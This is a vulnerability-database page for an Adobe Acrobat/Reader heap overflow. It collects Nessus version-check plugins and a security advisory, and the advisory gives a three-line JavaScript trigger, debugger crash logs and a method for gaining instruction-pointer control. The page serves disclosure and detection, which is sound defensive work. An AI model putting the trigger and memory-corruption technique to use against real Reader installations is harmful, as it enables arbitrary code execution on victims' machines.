Vulnerabilities > CVE-2018-4947 - Out-of-bounds Write vulnerability in Adobe Acrobat DC
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Heap Overflow vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Nessus
NASL family Windows NASL id ADOBE_READER_APSB18-09.NASL description The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2015.006.30417, 2017.011.30079, or 2018.011.20038. It is, therefore, affected by multiple vulnerabilities. Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 109896 published 2018-05-17 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109896 title Adobe Reader <= 2015.006.30417 / 2017.011.30079 / 2018.011.20038 Multiple Vulnerabilities (APSB18-09) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(109896); script_version("1.10"); script_cvs_date("Date: 2019/04/08 10:48:58"); script_cve_id( "CVE-2018-4947", "CVE-2018-4948", "CVE-2018-4949", "CVE-2018-4950", "CVE-2018-4951", "CVE-2018-4952", "CVE-2018-4953", "CVE-2018-4954", "CVE-2018-4955", "CVE-2018-4956", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4959", "CVE-2018-4960", "CVE-2018-4961", "CVE-2018-4962", "CVE-2018-4963", "CVE-2018-4964", "CVE-2018-4965", "CVE-2018-4966", "CVE-2018-4967", "CVE-2018-4968", "CVE-2018-4969", "CVE-2018-4970", "CVE-2018-4971", "CVE-2018-4972", "CVE-2018-4973", "CVE-2018-4974", "CVE-2018-4975", "CVE-2018-4976", "CVE-2018-4977", "CVE-2018-4978", "CVE-2018-4979", "CVE-2018-4980", "CVE-2018-4981", "CVE-2018-4982", "CVE-2018-4983", "CVE-2018-4984", "CVE-2018-4985", "CVE-2018-4986", "CVE-2018-4987", "CVE-2018-4988", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4993", "CVE-2018-4995", "CVE-2018-4996", "CVE-2018-12812", "CVE-2018-12815" ); script_bugtraq_id( 104102, 104167, 104168, 104169, 104171, 104172, 104173, 104174, 104175, 104176, 104177 ); script_name(english:"Adobe Reader <= 2015.006.30417 / 2017.011.30079 / 2018.011.20038 Multiple Vulnerabilities (APSB18-09)"); script_summary(english:"Checks the version of Adobe Reader."); script_set_attribute(attribute:"synopsis", value: "The version of Adobe Reader installed on the remote Windows host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2015.006.30417, 2017.011.30079, or 2018.011.20038. It is, therefore, affected by multiple vulnerabilities. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number."); script_set_attribute(attribute:"see_also", value:"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html"); script_set_attribute(attribute:"solution", value: "Upgrade to Adobe Reader 2015.006.30418 / 2017.011.30080 / 2018.011.20040 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-4947"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/14"); script_set_attribute(attribute:"patch_publication_date", value:"2018/05/14"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/05/17"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:acrobat_reader"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Windows"); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("adobe_reader_installed.nasl"); script_require_keys("SMB/Registry/Enumerated", "installed_sw/Adobe Reader"); exit(0); } include("vcf.inc"); include("vcf_extras.inc"); get_kb_item_or_exit("SMB/Registry/Enumerated"); app_info = vcf::adobe_reader::get_app_info(); constraints = [ { "min_version" : "15.6", "max_version" : "15.6.30417", "fixed_version" : "15.6.30418" }, { "min_version" : "17.8", "max_version" : "17.11.30079", "fixed_version" : "17.11.30080" }, { "min_version" : "15.7", "max_version" : "18.11.20038", "fixed_version" : "18.11.20040" } ]; # using adobe_reader namespace check_version_and_report to properly detect Continuous vs Classic, # and limit ver segments to 3 (18.x.y vs 18.x.y.12345) with max_segs:3 vcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);
NASL family Windows NASL id ADOBE_ACROBAT_APSB18-09.NASL description The version of Adobe Acrobat installed on the remote Windows host is a version prior to 2015.006.30418, 2017.011.30080, or 2018.011.20040. It is, therefore, affected by multiple vulnerabilities. Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 109895 published 2018-05-17 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109895 title Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(109895); script_version("1.9"); script_cvs_date("Date: 2019/04/08 10:48:58"); script_cve_id( "CVE-2018-4947", "CVE-2018-4948", "CVE-2018-4949", "CVE-2018-4950", "CVE-2018-4951", "CVE-2018-4952", "CVE-2018-4953", "CVE-2018-4954", "CVE-2018-4955", "CVE-2018-4956", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4959", "CVE-2018-4960", "CVE-2018-4961", "CVE-2018-4962", "CVE-2018-4963", "CVE-2018-4964", "CVE-2018-4965", "CVE-2018-4966", "CVE-2018-4967", "CVE-2018-4968", "CVE-2018-4969", "CVE-2018-4970", "CVE-2018-4971", "CVE-2018-4972", "CVE-2018-4973", "CVE-2018-4974", "CVE-2018-4975", "CVE-2018-4976", "CVE-2018-4977", "CVE-2018-4978", "CVE-2018-4979", "CVE-2018-4980", "CVE-2018-4981", "CVE-2018-4982", "CVE-2018-4983", "CVE-2018-4984", "CVE-2018-4985", "CVE-2018-4986", "CVE-2018-4987", "CVE-2018-4988", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4993", "CVE-2018-4995", "CVE-2018-4996", "CVE-2018-12812", "CVE-2018-12815" ); script_bugtraq_id( 104102, 104167, 104168, 104169, 104171, 104172, 104173, 104174, 104175, 104176, 104177 ); script_name(english:"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09)"); script_summary(english:"Checks the version of Adobe Acrobat."); script_set_attribute(attribute:"synopsis", value: "The version of Adobe Acrobat installed on the remote Windows host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Adobe Acrobat installed on the remote Windows host is a version prior to 2015.006.30418, 2017.011.30080, or 2018.011.20040. It is, therefore, affected by multiple vulnerabilities. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number."); script_set_attribute(attribute:"see_also", value:"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html"); script_set_attribute(attribute:"solution", value: "Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080 / 2018.011.20040 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-4947"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/14"); script_set_attribute(attribute:"patch_publication_date", value:"2018/05/14"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/05/17"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:acrobat"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Windows"); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("adobe_acrobat_installed.nasl"); script_require_keys("SMB/Registry/Enumerated", "installed_sw/Adobe Acrobat"); exit(0); } include("vcf.inc"); include("vcf_extras.inc"); get_kb_item_or_exit("SMB/Registry/Enumerated"); app_info = vcf::get_app_info(app:"Adobe Acrobat", win_local:TRUE); constraints = [ { "min_version" : "15.6", "max_version" : "15.6.30417", "fixed_version" : "15.6.30418" }, { "min_version" : "17.8", "max_version" : "17.11.30079", "fixed_version" : "17.11.30080" }, { "min_version" : "15.7", "max_version" : "18.11.20038", "fixed_version" : "18.11.20040" } ]; # using adobe_reader namespace check_version_and_report to properly detect Continuous vs Classic, # and limit ver segments to 3 (18.x.y vs 18.x.y.12345) with max_segs:3 vcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);
NASL family MacOS X Local Security Checks NASL id MACOSX_ADOBE_READER_APSB18-09.NASL description The version of Adobe Reader installed on the remote macOS or Mac OS X host is a version prior to 2015.006.30419, 2017.011.30080, or 2018.011.20040. It is, therefore, affected by multiple vulnerabilities. Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 109898 published 2018-05-17 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109898 title Adobe Reader < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(109898); script_version("1.8"); script_cvs_date("Date: 2019/11/04"); script_cve_id( "CVE-2018-4947", "CVE-2018-4948", "CVE-2018-4949", "CVE-2018-4950", "CVE-2018-4951", "CVE-2018-4952", "CVE-2018-4953", "CVE-2018-4954", "CVE-2018-4955", "CVE-2018-4956", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4959", "CVE-2018-4960", "CVE-2018-4961", "CVE-2018-4962", "CVE-2018-4963", "CVE-2018-4964", "CVE-2018-4965", "CVE-2018-4966", "CVE-2018-4967", "CVE-2018-4968", "CVE-2018-4969", "CVE-2018-4970", "CVE-2018-4971", "CVE-2018-4972", "CVE-2018-4973", "CVE-2018-4974", "CVE-2018-4975", "CVE-2018-4976", "CVE-2018-4977", "CVE-2018-4978", "CVE-2018-4979", "CVE-2018-4980", "CVE-2018-4981", "CVE-2018-4982", "CVE-2018-4983", "CVE-2018-4984", "CVE-2018-4985", "CVE-2018-4986", "CVE-2018-4987", "CVE-2018-4988", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4993", "CVE-2018-4995", "CVE-2018-4996", "CVE-2018-12812", "CVE-2018-12815" ); script_bugtraq_id( 104102, 104167, 104168, 104169, 104171, 104172, 104173, 104174, 104175, 104176, 104177 ); script_name(english:"Adobe Reader < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)"); script_summary(english:"Checks the version of Adobe Reader."); script_set_attribute(attribute:"synopsis", value: "The version of Adobe Reader installed on the remote host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Adobe Reader installed on the remote macOS or Mac OS X host is a version prior to 2015.006.30419, 2017.011.30080, or 2018.011.20040. It is, therefore, affected by multiple vulnerabilities. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number."); script_set_attribute(attribute:"see_also", value:"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html"); script_set_attribute(attribute:"solution", value: "Upgrade to Adobe Reader 2015.006.30418 / 2017.011.30080 / 2018.011.20040 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-4996"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/14"); script_set_attribute(attribute:"patch_publication_date", value:"2018/05/14"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/05/17"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:acrobat_reader"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"MacOS X Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("macosx_adobe_reader_installed.nasl"); script_require_keys("Host/local_checks_enabled", "Host/MacOSX/Version", "installed_sw/Adobe Reader"); exit(0); } include("vcf.inc"); get_kb_item_or_exit("Host/local_checks_enabled"); os = get_kb_item("Host/MacOSX/Version"); if (empty_or_null(os)) audit(AUDIT_OS_NOT, "Mac OS X"); app_info = vcf::get_app_info(app:"Adobe Reader"); base_dir = app_info['path'] - "/Applications"; track = get_kb_item("MacOSX/Adobe_Reader"+base_dir+"/Track"); if (!empty_or_null(track) && track == '2017') { constraints = [ { "min_version" : "17.8", "fixed_version" : "17.11.30080" } ]; } else { constraints = [ { "min_version" : "15.6", "fixed_version" : "15.6.30418" }, { "min_version" : "18.8", "fixed_version" : "18.11.20040" } ]; } vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);
NASL family MacOS X Local Security Checks NASL id MACOSX_ADOBE_ACROBAT_APSB18-09.NASL description The version of Adobe Acrobat installed on the remote macOS or Mac OS X host is a version prior to 2015.006.30418, 2017.011.30080, or 2018.011.20040. It is, therefore, affected by multiple vulnerabilities. Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 109897 published 2018-05-17 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109897 title Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(109897); script_version("1.9"); script_cvs_date("Date: 2019/04/22 9:47:13"); script_cve_id( "CVE-2018-4947", "CVE-2018-4948", "CVE-2018-4949", "CVE-2018-4950", "CVE-2018-4951", "CVE-2018-4952", "CVE-2018-4953", "CVE-2018-4954", "CVE-2018-4955", "CVE-2018-4956", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4959", "CVE-2018-4960", "CVE-2018-4961", "CVE-2018-4962", "CVE-2018-4963", "CVE-2018-4964", "CVE-2018-4965", "CVE-2018-4966", "CVE-2018-4967", "CVE-2018-4968", "CVE-2018-4969", "CVE-2018-4970", "CVE-2018-4971", "CVE-2018-4972", "CVE-2018-4973", "CVE-2018-4974", "CVE-2018-4975", "CVE-2018-4976", "CVE-2018-4977", "CVE-2018-4978", "CVE-2018-4979", "CVE-2018-4980", "CVE-2018-4981", "CVE-2018-4982", "CVE-2018-4983", "CVE-2018-4984", "CVE-2018-4985", "CVE-2018-4986", "CVE-2018-4987", "CVE-2018-4988", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4993", "CVE-2018-4995", "CVE-2018-4996", "CVE-2018-12812", "CVE-2018-12815" ); script_bugtraq_id( 104102, 104167, 104168, 104169, 104171, 104172, 104173, 104174, 104175, 104176, 104177 ); script_name(english:"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)"); script_summary(english:"Checks the version of Adobe Acrobat."); script_set_attribute(attribute:"synopsis", value: "The version of Adobe Acrobat installed on the remote host is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The version of Adobe Acrobat installed on the remote macOS or Mac OS X host is a version prior to 2015.006.30418, 2017.011.30080, or 2018.011.20040. It is, therefore, affected by multiple vulnerabilities. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number."); script_set_attribute(attribute:"see_also", value:"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html"); script_set_attribute(attribute:"solution", value: "Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080 / 2018.011.20040 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-4947"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/14"); script_set_attribute(attribute:"patch_publication_date", value:"2018/05/14"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/05/17"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:acrobat"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"MacOS X Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("macosx_adobe_acrobat_installed.nbin"); script_require_keys("Host/local_checks_enabled", "Host/MacOSX/Version", "installed_sw/Adobe Acrobat"); exit(0); } include("vcf.inc"); include("vcf_extras.inc"); get_kb_item_or_exit("Host/local_checks_enabled"); os = get_kb_item("Host/MacOSX/Version"); if (empty_or_null(os)) audit(AUDIT_OS_NOT, "Mac OS X"); app_info = vcf::get_app_info(app:"Adobe Acrobat"); constraints = [ { "min_version" : "15.6", "fixed_version" : "15.6.30418" }, { "min_version" : "17.8", "fixed_version" : "17.11.30080" }, { "min_version" : "18.8", "fixed_version" : "18.11.20040" } ]; vcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);
Seebug
bulletinFamily | exploit |
description | ### Summary A specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. ### Tested Versions Adobe Acrobat Reader DC 2018.009.20044 ### Product URLs https://get.adobe.com/reader/ ### CVSSv3 Score 6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H ### CWE CWE-908: Use of Uninitialized Resource ### Details Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. The method calls required to trigger this vulnerability are privileged and can only be called from trusted functions. Adobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms This give the potential attacker the ability to precisely control memory layout and poses additional attack surface. While executing a following piece of javascript code a specific condition leading to memory corruption can occur (it should be noted that all three of these lines require higher privileges, meaning they must be executed in a trusted PDF file): ``` var a = this.Collab.drivers; this.SetRSSMethods( ); this.ANFancyAlertImpl(this); ``` Upon calling `this.ANFancyAlertImpl(this)` a memory object will be allocated. The pointer to this object is later passed to other functions without it being initialized. This leads to undefined behaviour that depends on the previous contents of the same memory region, leading to memory corruption and ultimately to arbitrary code execution. Two pointers from the object end up being used as second two arguments in a `memcpy` call which can easily be abused to cause a heap-based buffer overflow: ``` (660.8f0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. DC\Reader\plug_ins\Annots.api Reader DC\Reader\plug_ins\Annots.api - eax=81818180 ebx=c0c0c0c0 ecx=c0c0c0c0 edx=c0c0c0c0 esi=c0c0c0c0 edi=36dbafe0 eip=645ff26d esp=001ac70c ebp=001ac738 iopl=0 nv up ei pl nz na po cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210203 MSVCR120!memcpy+0x2a: 645ff26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi] 0:000> k # ChildEBP RetAddr 00 001ac710 7748e62e MSVCR120!memcpy+0x2a [f:\dd\vctools\crt\crtw32\string\i386\memcpy.asm @ 188] WARNING: Stack unwind information not available. Following frames may be wrong. 01 001ac738 7748e5a2 Annots!PlugInMain+0xa72d 02 001ac760 7748e3c6 Annots!PlugInMain+0xa6a1 03 001ac770 776412e1 Annots!PlugInMain+0xa4c5 04 001ac780 774f7258 Annots!PlugInMain+0x1bd3e0 05 001ac7ac 570bd6b2 Annots!PlugInMain+0x73357 06 001ac81c 570c1c35 EScript!mozilla::HashBytes+0x2d050 07 001ac84c 5709387b EScript!mozilla::HashBytes+0x315d3 08 001ac8dc 570932df EScript!mozilla::HashBytes+0x3219 09 001ac8f8 570bd21d EScript!mozilla::HashBytes+0x2c7d 0a 001ac944 570bd1b0 EScript!mozilla::HashBytes+0x2cbbb ``` Stepping back a couple of function calls reveals where the `memcpy` arguments come from: ``` 0:000> bp Annots!PluginMain+0x1bd3db b breakpoint 0 redefined 0:000> g Breakpoint 0 hit eax=267eef94 ebx=00000000 ecx=0030c438 edx=77898090 esi=1f266fc0 edi=2902efb8 eip=776412dc esp=0030c414 ebp=0030c41c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 Annots!PlugInMain+0x1bd3db: 776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae) 0:000> u eip-1 Annots!PlugInMain+0x1bd3da: 776412db 50 push eax 776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae) 776412e1 8b4508 mov eax,dword ptr [ebp+8] 776412e4 8be5 mov esp,ebp 776412e6 5d pop ebp 776412e7 c20400 ret 4 776412ea 55 push ebp 776412eb 8bec mov ebp,esp 0:000> dd poi(eax) 26a5efe8 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 26a5eff8 c0c0c0c0 c0c0c0c0 ???????? ???????? 26a5f008 ???????? ???????? ???????? ???????? 26a5f018 ???????? ???????? ???????? ???????? 26a5f028 ???????? ???????? ???????? ???????? 26a5f038 ???????? ???????? ???????? ???????? 26a5f048 ???????? ???????? ???????? ???????? 26a5f058 ???????? ???????? ???????? ???????? 0:000> !heap -p -a poi(eax) address 26a5efe8 found in _DPH_HEAP_ROOT @ 61000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 26954750: 26a5efb8 48 - 26a5e000 2000 6ac68e89 verifier!AVrfDebugPageHeapAllocate+0x00000229 77276206 ntdll!RtlDebugAllocateHeap+0x00000030 7723a127 ntdll!RtlpAllocateHeap+0x000000c4 77205950 ntdll!RtlAllocateHeap+0x0000023a 6326ed43 MSVCR120!malloc+0x00000049 [f:\dd\vctools\crt\crtw32\heap\malloc.c @ 92] 6326ee1c MSVCR120!operator new+0x0000001d [f:\dd\vctools\crt\crtw32\heap\new.cpp @ 59] 7748a048 Annots!PlugInMain+0x00006147 7748a00b Annots!PlugInMain+0x0000610a 7748daea Annots!PlugInMain+0x00009be9 774890a1 Annots!PlugInMain+0x000051a0 7748f546 Annots!PlugInMain+0x0000b645 774a5069 Annots!PlugInMain+0x00021168 7763d75e Annots!PlugInMain+0x001b985d 515db634 EScript!mozilla::HashBytes+0x0004afd2 515db51f EScript!mozilla::HashBytes+0x0004aebd 7763d6ab Annots!PlugInMain+0x001b97aa 774a5069 Annots!PlugInMain+0x00021168 7763d75e Annots!PlugInMain+0x001b985d 515db634 EScript!mozilla::HashBytes+0x0004afd2 515db51f EScript!mozilla::HashBytes+0x0004aebd 7763d6ab Annots!PlugInMain+0x001b97aa 774a5069 Annots!PlugInMain+0x00021168 774a4f71 Annots!PlugInMain+0x00021070 7762aaa2 Annots!PlugInMain+0x001a6ba1 7762aad8 Annots!PlugInMain+0x001a6bd7 77626588 Annots!PlugInMain+0x001a2687 7762af80 Annots!PlugInMain+0x001a707f 51f8ab90 AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3210 515d267d EScript!mozilla::HashBytes+0x0004201b 515b75b6 EScript!mozilla::HashBytes+0x00026f54 515b17c2 EScript!mozilla::HashBytes+0x00021160 515b05f0 EScript!mozilla::HashBytes+0x0001ff8e ``` In the above debugging log, we break at `Annots!PluginMain+0x1bd3db` to reveal `eax` being passed as argument to the function call points to a newly allocated and uninitialized buffer. With page heap enabled, the contents of the allocated memory will be filled with `0xc0c0c0c0`. The code and memory layout after corruption just happen to line up in such a way to allow for easy `eip` control by simply adjusting the size and contents of environment variables: ``` # set AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=AAAAAAAAAAAAAAAAAAAAAAAA.... # cdb "c:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "c:\Users\user\Desktop\js_memcpy_min.pdf" Microsoft (R) Windows Debugger Version 10.0.15063.468 X86 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: "c:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "c:\Users\user\Desktop\js_memcpy_min.pdf" Symbol search path is: srv* Executable search path is: ModLoad: 013b0000 015d5000 AcroRd32.exe ModLoad: 771b0000 772f2000 ntdll.dll ModLoad: 75d80000 75e55000 C:\Windows\system32\kernel32.dll ModLoad: 75340000 7538b000 C:\Windows\system32\KERNELBASE.dll ModLoad: 75690000 75759000 C:\Windows\system32\USER32.dll ModLoad: 75400000 7544e000 C:\Windows\system32\GDI32.dll ModLoad: 75f50000 75f5a000 C:\Windows\system32\LPK.dll ModLoad: 75450000 754ed000 C:\Windows\system32\USP10.dll ModLoad: 758d0000 7597c000 C:\Windows\system32\msvcrt.dll ModLoad: 75f60000 76001000 C:\Windows\system32\ADVAPI32.dll ModLoad: 761b0000 761c9000 C:\Windows\SYSTEM32\sechost.dll ModLoad: 75550000 755f2000 C:\Windows\system32\RPCRT4.dll ModLoad: 75a40000 75a97000 C:\Windows\system32\SHLWAPI.dll (8b0.3f8): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=00000000 ecx=001bf42c edx=771f6c74 esi=fffffffe edi=00000000 eip=772505d9 esp=001bf448 ebp=001bf474 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 ntdll!LdrpDoDebuggerBreak+0x2c: 772505d9 cc int 3 0:000> g ModLoad: 75e60000 75e7f000 C:\Windows\system32\IMM32.DLL ModLoad: 753f0000 753f6000 C:\Windows\system32\NSI.dll (8b0.3f8): C++ EH exception - code e06d7363 (first chance) ModLoad: 74f60000 74fac000 C:\Windows\system32\apphelp.dll ModLoad: 64a70000 64ac1000 c:\Program Files\Adobe\Acrobat Reader DC\Reader\sqlite.dll (8b0.3f8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=046503d8 ebx=00000000 ecx=046503d8 edx=06672fc8 esi=03f75478 edi=0656ffe8 eip=41414141 esp=001bc14c ebp=001bc174 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 41414141 ?? ??? ``` ### Crash Information Crash output with PageHeap enabled: ``` First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for c:\Program Files\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api *** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\Program Files\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api - eax=011716ce ebx=00000002 ecx=011716cc edx=011716cc esi=00000002 edi=37561000 eip=6326f26d esp=0016c6f0 ebp=0016c71c iopl=0 nv up ei pl nz ac po cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 MSVCR120!memcpy+0x2a: 6326f26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi] 0:000> k ChildEBP RetAddr 0016c6f4 7748e62e MSVCR120!memcpy+0x2a WARNING: Stack unwind information not available. Following frames may be wrong. 0016c71c 7748e5a2 Annots!PlugInMain+0xa72d 0016c744 7748e3c6 Annots!PlugInMain+0xa6a1 0016c754 776412e1 Annots!PlugInMain+0xa4c5 